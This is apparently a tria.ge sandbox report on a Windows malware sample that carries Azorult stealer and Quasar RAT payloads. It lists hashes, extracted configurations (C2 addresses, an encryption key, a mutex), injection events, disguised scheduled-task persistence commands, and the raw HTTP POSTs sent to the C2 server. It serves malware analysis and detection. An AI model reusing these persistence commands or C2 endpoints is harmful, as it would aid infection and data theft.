Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Overview
overview
10Static
static
1027f824a80e...71.exe
windows7-x64
1027f824a80e...71.exe
windows10-2004-x64
102c4115951e...47.exe
windows7-x64
102c4115951e...47.exe
windows10-2004-x64
10500c00d4d7...0a.exe
windows7-x64
1500c00d4d7...0a.exe
windows10-2004-x64
373592f050e...1c.exe
windows7-x64
1073592f050e...1c.exe
windows10-2004-x64
10b086986db5...76.exe
windows7-x64
10b086986db5...76.exe
windows10-2004-x64
10b99dab26a9...fc.exe
windows7-x64
10b99dab26a9...fc.exe
windows10-2004-x64
10c9fc6dc8c8...e6.exe
windows7-x64
10c9fc6dc8c8...e6.exe
windows10-2004-x64
10caf5832156...ad.exe
windows7-x64
10caf5832156...ad.exe
windows10-2004-x64
10cf18bda81a...a2.exe
windows7-x64
10cf18bda81a...a2.exe
windows10-2004-x64
10d1f1126921...3e.exe
windows7-x64
10d1f1126921...3e.exe
windows10-2004-x64
10e329eaa5c0...cd.exe
windows7-x64
10e329eaa5c0...cd.exe
windows10-2004-x64
10eba45a34e3...0b.exe
windows7-x64
10eba45a34e3...0b.exe
windows10-2004-x64
10Analysis
-
max time kernel
4s -
max time network
149s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
06/03/2025, 02:28 UTC
Behavioral task
behavioral1
Sample
27f824a80ebdad6b53d01f487ecb17616c0a2a9d9700ca3be3b1c1a24cdc1f71.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
27f824a80ebdad6b53d01f487ecb17616c0a2a9d9700ca3be3b1c1a24cdc1f71.exe
Resource
win10v2004-20250217-en
Behavioral task
behavioral3
Sample
2c4115951e3a55fe85cf0ebb6fcf5e65ccbebfa0774a3f15db7856b74e8e6647.exe
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
2c4115951e3a55fe85cf0ebb6fcf5e65ccbebfa0774a3f15db7856b74e8e6647.exe
Resource
win10v2004-20250217-en
Behavioral task
behavioral5
Sample
500c00d4d789bb18252fd5f3fe5ce41ae7afc1175dfeb0eb9553636c2c15450a.exe
Resource
win7-20241010-en
Behavioral task
behavioral6
Sample
500c00d4d789bb18252fd5f3fe5ce41ae7afc1175dfeb0eb9553636c2c15450a.exe
Resource
win10v2004-20250217-en
Behavioral task
behavioral7
Sample
73592f050eb0d6d8621fed9a739c491029c7975f257a9ceba4c6f2f211c7831c.exe
Resource
win7-20250207-en
Behavioral task
behavioral8
Sample
73592f050eb0d6d8621fed9a739c491029c7975f257a9ceba4c6f2f211c7831c.exe
Resource
win10v2004-20250217-en
Behavioral task
behavioral9
Sample
b086986db5990b434fbf33a030d727d4a5316c5cc154ebf0c1b9433833670176.exe
Resource
win7-20240903-en
Behavioral task
behavioral10
Sample
b086986db5990b434fbf33a030d727d4a5316c5cc154ebf0c1b9433833670176.exe
Resource
win10v2004-20250217-en
Behavioral task
behavioral11
Sample
b99dab26a9787a8361f75905fa34de2fc05e19f6d5d70bd70f045e0bab05f4fc.exe
Resource
win7-20241010-en
Behavioral task
behavioral12
Sample
b99dab26a9787a8361f75905fa34de2fc05e19f6d5d70bd70f045e0bab05f4fc.exe
Resource
win10v2004-20250217-en
Behavioral task
behavioral13
Sample
c9fc6dc8c8dbff7eff9a199440ef52348cf2d410da5d6940d3648d6fa1f568e6.exe
Resource
win7-20240903-en
Behavioral task
behavioral14
Sample
c9fc6dc8c8dbff7eff9a199440ef52348cf2d410da5d6940d3648d6fa1f568e6.exe
Resource
win10v2004-20250217-en
Behavioral task
behavioral15
Sample
caf5832156e063db5f23ccdb510600cefc45d65281d57771f19637daf7f3d7ad.exe
Resource
win7-20240903-en
Behavioral task
behavioral16
Sample
caf5832156e063db5f23ccdb510600cefc45d65281d57771f19637daf7f3d7ad.exe
Resource
win10v2004-20250217-en
Behavioral task
behavioral17
Sample
cf18bda81a0c95a61a47ece2c1fd879e86e3f1fbd64f3e291fee2d5ca96171a2.exe
Resource
win7-20240903-en
Behavioral task
behavioral18
Sample
cf18bda81a0c95a61a47ece2c1fd879e86e3f1fbd64f3e291fee2d5ca96171a2.exe
Resource
win10v2004-20250217-en
Behavioral task
behavioral19
Sample
d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e.exe
Resource
win7-20241010-en
Behavioral task
behavioral20
Sample
d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e.exe
Resource
win10v2004-20250217-en
Behavioral task
behavioral21
Sample
e329eaa5c013df43ea579571a5ae4d65f8cfd04809aeeb219551c80d6ff42bcd.exe
Resource
win7-20240729-en
Behavioral task
behavioral22
Sample
e329eaa5c013df43ea579571a5ae4d65f8cfd04809aeeb219551c80d6ff42bcd.exe
Resource
win10v2004-20250217-en
Behavioral task
behavioral23
Sample
eba45a34e3dfa65dd307af9f5c018bf48aeb4a08fac42ca2899f9334b34e870b.exe
Resource
win7-20240903-en
Behavioral task
behavioral24
Sample
eba45a34e3dfa65dd307af9f5c018bf48aeb4a08fac42ca2899f9334b34e870b.exe
Resource
win10v2004-20250217-en
General
-
Target
d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e.exe
-
Size
2.0MB
-
MD5
3122ecf57731e501138565db5741fe49
-
SHA1
5a41892c9e73afde78510c0426da994d21515e9e
-
SHA256
d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e
-
SHA512
d49434de0cbb63f44bba3e6e57bf7471bc2ce71b6efa81c1bacbf3bcf8e6c4138526c06760cb461b46ccb0b44f2d9e2422bd37352c1f60a952dfbaa6a8be8513
-
SSDEEP
24576:su6J33O0c+JY5UZ+XC0kGso6FaI1IXgM6YmenKKSUlmDaGJTA4Pqa6jUvOkQwKYY:2u0c++OCvkGs9Fap5aLKLkDl+dUvO9Yu
Malware Config
Extracted
azorult
http://0x21.in:8000/_az/
Extracted
quasar
1.3.0.0
EbayProfiles
5.8.88.191:443
sockartek.icu:443
QSR_MUTEX_0kBRNrRz5TDLEQouI0
-
encryption_key
MWhG6wsClMX8aJM2CVXT
-
install_name
winsock.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
win defender run
-
subdirectory
SubDir
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Azorult family
-
Quasar family
-
Quasar payload 6 IoCs
resource yara_rule behavioral19/memory/3032-53-0x0000000000B90000-0x0000000000BEE000-memory.dmp family_quasar behavioral19/memory/2764-63-0x0000000000980000-0x00000000009DE000-memory.dmp family_quasar behavioral19/memory/1612-98-0x00000000011A0000-0x00000000011FE000-memory.dmp family_quasar behavioral19/memory/3032-53-0x0000000000B90000-0x0000000000BEE000-memory.dmp family_quasar behavioral19/memory/2764-63-0x0000000000980000-0x00000000009DE000-memory.dmp family_quasar behavioral19/memory/1612-98-0x00000000011A0000-0x00000000011FE000-memory.dmp family_quasar -
Executes dropped EXE 4 IoCs
pid Process 2940 vnc.exe 3032 windef.exe 2940 vnc.exe 3032 windef.exe -
Loads dropped DLL 16 IoCs
pid Process 2808 d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e.exe 2808 d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e.exe 2808 d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e.exe 2808 d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e.exe 2808 d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e.exe 2808 d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e.exe 2808 d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e.exe 2808 d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e.exe 2808 d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e.exe 2808 d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e.exe 2808 d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e.exe 2808 d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e.exe 2808 d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e.exe 2808 d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e.exe 2808 d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e.exe 2808 d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e.exe -
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\r: d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e.exe File opened (read-only) \??\v: d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e.exe File opened (read-only) \??\g: d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e.exe File opened (read-only) \??\i: d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e.exe File opened (read-only) \??\l: d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e.exe File opened (read-only) \??\n: d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e.exe File opened (read-only) \??\q: d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e.exe File opened (read-only) \??\s: d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e.exe File opened (read-only) \??\u: d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e.exe File opened (read-only) \??\k: d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e.exe File opened (read-only) \??\m: d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e.exe File opened (read-only) \??\t: d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e.exe File opened (read-only) \??\z: d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e.exe File opened (read-only) \??\p: d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e.exe File opened (read-only) \??\w: d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e.exe File opened (read-only) \??\x: d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e.exe File opened (read-only) \??\y: d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e.exe File opened (read-only) \??\a: d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e.exe File opened (read-only) \??\b: d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e.exe File opened (read-only) \??\e: d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e.exe File opened (read-only) \??\h: d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e.exe File opened (read-only) \??\j: d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e.exe File opened (read-only) \??\o: d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e.exe -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 9 ip-api.com 13 api.ipify.org -
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 svchost.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 2808 set thread context of 2664 2808 d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e.exe 33 PID 2940 set thread context of 2688 2940 vnc.exe 32 PID 2808 set thread context of 2664 2808 d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e.exe 33 PID 2940 set thread context of 2688 2940 vnc.exe 32 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 2 IoCs
pid pid_target Process procid_target 360 2764 WerFault.exe 39 360 2764 WerFault.exe 39 -
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vnc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language windef.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 752 PING.EXE -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 752 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1416 schtasks.exe 2392 schtasks.exe 588 schtasks.exe 2368 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 2808 d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e.exe 2808 d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e.exe 2808 d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e.exe 2808 d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
pid Process 2940 vnc.exe 2940 vnc.exe -
Suspicious use of WriteProcessMemory 50 IoCs
description pid Process procid_target PID 2808 wrote to memory of 2940 2808 d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e.exe 30 PID 2808 wrote to memory of 2940 2808 d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e.exe 30 PID 2808 wrote to memory of 2940 2808 d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e.exe 30 PID 2808 wrote to memory of 2940 2808 d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e.exe 30 PID 2940 wrote to memory of 2688 2940 vnc.exe 32 PID 2940 wrote to memory of 2688 2940 vnc.exe 32 PID 2940 wrote to memory of 2688 2940 vnc.exe 32 PID 2940 wrote to memory of 2688 2940 vnc.exe 32 PID 2808 wrote to memory of 3032 2808 d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e.exe 31 PID 2808 wrote to memory of 3032 2808 d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e.exe 31 PID 2808 wrote to memory of 3032 2808 d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e.exe 31 PID 2808 wrote to memory of 3032 2808 d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e.exe 31 PID 2940 wrote to memory of 2688 2940 vnc.exe 32 PID 2808 wrote to memory of 2664 2808 d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e.exe 33 PID 2808 wrote to memory of 2664 2808 d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e.exe 33 PID 2808 wrote to memory of 2664 2808 d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e.exe 33 PID 2808 wrote to memory of 2664 2808 d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e.exe 33 PID 2808 wrote to memory of 2664 2808 d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e.exe 33 PID 2808 wrote to memory of 2664 2808 d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e.exe 33 PID 2940 wrote to memory of 2688 2940 vnc.exe 32 PID 2808 wrote to memory of 1416 2808 d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e.exe 34 PID 2808 wrote to memory of 1416 2808 d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e.exe 34 PID 2808 wrote to memory of 1416 2808 d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e.exe 34 PID 2808 wrote to memory of 1416 2808 d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e.exe 34 PID 2940 wrote to memory of 2688 2940 vnc.exe 32 PID 2808 wrote to memory of 2940 2808 d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e.exe 30 PID 2808 wrote to memory of 2940 2808 d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e.exe 30 PID 2808 wrote to memory of 2940 2808 d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e.exe 30 PID 2808 wrote to memory of 2940 2808 d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e.exe 30 PID 2940 wrote to memory of 2688 2940 vnc.exe 32 PID 2940 wrote to memory of 2688 2940 vnc.exe 32 PID 2940 wrote to memory of 2688 2940 vnc.exe 32 PID 2940 wrote to memory of 2688 2940 vnc.exe 32 PID 2808 wrote to memory of 3032 2808 d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e.exe 31 PID 2808 wrote to memory of 3032 2808 d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e.exe 31 PID 2808 wrote to memory of 3032 2808 d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e.exe 31 PID 2808 wrote to memory of 3032 2808 d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e.exe 31 PID 2940 wrote to memory of 2688 2940 vnc.exe 32 PID 2808 wrote to memory of 2664 2808 d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e.exe 33 PID 2808 wrote to memory of 2664 2808 d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e.exe 33 PID 2808 wrote to memory of 2664 2808 d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e.exe 33 PID 2808 wrote to memory of 2664 2808 d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e.exe 33 PID 2808 wrote to memory of 2664 2808 d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e.exe 33 PID 2808 wrote to memory of 2664 2808 d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e.exe 33 PID 2940 wrote to memory of 2688 2940 vnc.exe 32 PID 2808 wrote to memory of 1416 2808 d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e.exe 34 PID 2808 wrote to memory of 1416 2808 d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e.exe 34 PID 2808 wrote to memory of 1416 2808 d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e.exe 34 PID 2808 wrote to memory of 1416 2808 d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e.exe 34 PID 2940 wrote to memory of 2688 2940 vnc.exe 32
Processes
-
C:\Users\Admin\AppData\Local\Temp\d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e.exe"C:\Users\Admin\AppData\Local\Temp\d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e.exe"1⤵
- Loads dropped DLL
- Enumerates connected drives
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2808 -
C:\Users\Admin\AppData\Local\Temp\vnc.exe"C:\Users\Admin\AppData\Local\Temp\vnc.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2940 -
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k3⤵
- Maps connected drives based on registry
PID:2688
-
-
-
C:\Users\Admin\AppData\Local\Temp\windef.exe"C:\Users\Admin\AppData\Local\Temp\windef.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3032 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "win defender run" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\windef.exe" /rl HIGHEST /f3⤵
- Scheduled Task/Job: Scheduled Task
PID:2392
-
-
C:\Users\Admin\AppData\Roaming\SubDir\winsock.exe"C:\Users\Admin\AppData\Roaming\SubDir\winsock.exe"3⤵PID:2764
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "win defender run" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\winsock.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:588
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\3dQUaooQcsag.bat" "4⤵PID:1908
-
C:\Windows\SysWOW64\chcp.comchcp 650015⤵PID:1144
-
-
C:\Windows\SysWOW64\PING.EXEping -n 10 localhost5⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:752
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2764 -s 14924⤵
- Program crash
PID:360
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e.exe"C:\Users\Admin\AppData\Local\Temp\d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e.exe"2⤵
- System Location Discovery: System Language Discovery
PID:2664
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /tn RtkAudioService64 /tr "C:\Users\Admin\btpanui\SystemPropertiesPerformance.exe" /sc minute /mo 1 /F2⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1416
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {542D3AE6-ECCC-4758-836E-5295C4C6056A} S-1-5-21-3692679935-4019334568-335155002-1000:BCXRJFKE\Admin:Interactive:[1]1⤵PID:2284
-
C:\Users\Admin\btpanui\SystemPropertiesPerformance.exeC:\Users\Admin\btpanui\SystemPropertiesPerformance.exe2⤵PID:1708
-
C:\Users\Admin\AppData\Local\Temp\vnc.exe"C:\Users\Admin\AppData\Local\Temp\vnc.exe"3⤵PID:2384
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k4⤵PID:976
-
-
-
C:\Users\Admin\AppData\Local\Temp\windef.exe"C:\Users\Admin\AppData\Local\Temp\windef.exe"3⤵PID:1612
-
-
C:\Users\Admin\btpanui\SystemPropertiesPerformance.exe"C:\Users\Admin\btpanui\SystemPropertiesPerformance.exe"3⤵PID:112
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /tn RtkAudioService64 /tr "C:\Users\Admin\btpanui\SystemPropertiesPerformance.exe" /sc minute /mo 1 /F3⤵
- Scheduled Task/Job: Scheduled Task
PID:2368
-
-
Network
-
Remote address:8.8.8.8:53Request0x21.inIN AResponse0x21.inIN A44.221.84.105
-
Remote address:44.221.84.105:8000RequestPOST /_az/ HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
Host: 0x21.in:8000
Content-Length: 97
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Thu, 06 Mar 2025 02:28:30 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=; path=/; domain=.0x21.in:8000; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: btst=; path=/; domain=0x21.in:8000; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: btst=576a1ee1dc00d0265dcc553301203819|212.102.63.147|1741228110|1741228110|0|1|0; path=/; domain=.0x21.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=212.102.63.147; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
-
Remote address:8.8.8.8:53Request0x21.inIN AResponse0x21.inIN A44.221.84.105
-
Remote address:44.221.84.105:8000RequestPOST /_az/ HTTP/1.0
Host: 0x21.in
Connection: close
User-agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
Content-Length: 97
ResponseHTTP/1.1 200 OK
Date: Thu, 06 Mar 2025 02:28:31 GMT
Content-Type: text/html
Connection: close
Set-Cookie: btst=557d8d2c1a452ee94ee5179c33b30844|212.102.63.147|1741228111|1741228111|0|1|0; path=/; domain=.0x21.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=212.102.63.147; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
-
Remote address:8.8.8.8:53Requestip-api.comIN AResponseip-api.comIN A208.95.112.1
-
Remote address:208.95.112.1:80RequestGET /json/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0
Host: ip-api.com
Connection: Keep-Alive
-
Remote address:8.8.8.8:53Requestfreegeoip.netIN AResponsefreegeoip.netIN A3.33.130.190freegeoip.netIN A15.197.148.33
-
Remote address:3.33.130.190:80RequestGET /xml/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0
Host: freegeoip.net
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
date: Thu, 06 Mar 2025 02:28:43 GMT
content-length: 114
-
Remote address:8.8.8.8:53Requestapi.ipify.orgIN AResponseapi.ipify.orgIN A104.26.12.205api.ipify.orgIN A104.26.13.205api.ipify.orgIN A172.67.74.152
-
Remote address:104.26.12.205:80RequestGET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0
Host: api.ipify.org
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Type: text/plain
Content-Length: 14
Connection: keep-alive
Vary: Origin
cf-cache-status: DYNAMIC
Server: cloudflare
CF-RAY: 91be6bda89d07755-LHR
alt-svc: h2=":443"; ma=60
server-timing: cfL4;desc="?proto=TCP&rtt=39032&min_rtt=39032&rtt_var=19516&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=142&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
-
Remote address:208.95.112.1:80RequestGET /json/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0
Host: ip-api.com
Connection: Keep-Alive
-
Remote address:3.33.130.190:80RequestGET /xml/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0
Host: freegeoip.net
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
date: Thu, 06 Mar 2025 02:28:56 GMT
content-length: 114
-
Remote address:104.26.12.205:80RequestGET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0
Host: api.ipify.org
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Type: text/plain
Content-Length: 14
Connection: keep-alive
Vary: Origin
cf-cache-status: DYNAMIC
Server: cloudflare
CF-RAY: 91be6c2d7d373695-LHR
alt-svc: h2=":443"; ma=60
server-timing: cfL4;desc="?proto=TCP&rtt=34173&min_rtt=34173&rtt_var=17086&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=142&delivery_rate=0&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
-
Remote address:8.8.8.8:53Request0x21.inIN AResponse0x21.inIN A44.221.84.105
-
Remote address:44.221.84.105:8000RequestPOST /_az/ HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
Host: 0x21.in:8000
Content-Length: 97
Cache-Control: no-cache
Cookie: btst=576a1ee1dc00d0265dcc553301203819|212.102.63.147|1741228110|1741228110|0|1|0; snkz=212.102.63.147
ResponseHTTP/1.1 200 OK
Date: Thu, 06 Mar 2025 02:29:05 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=; path=/; domain=.0x21.in:8000; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
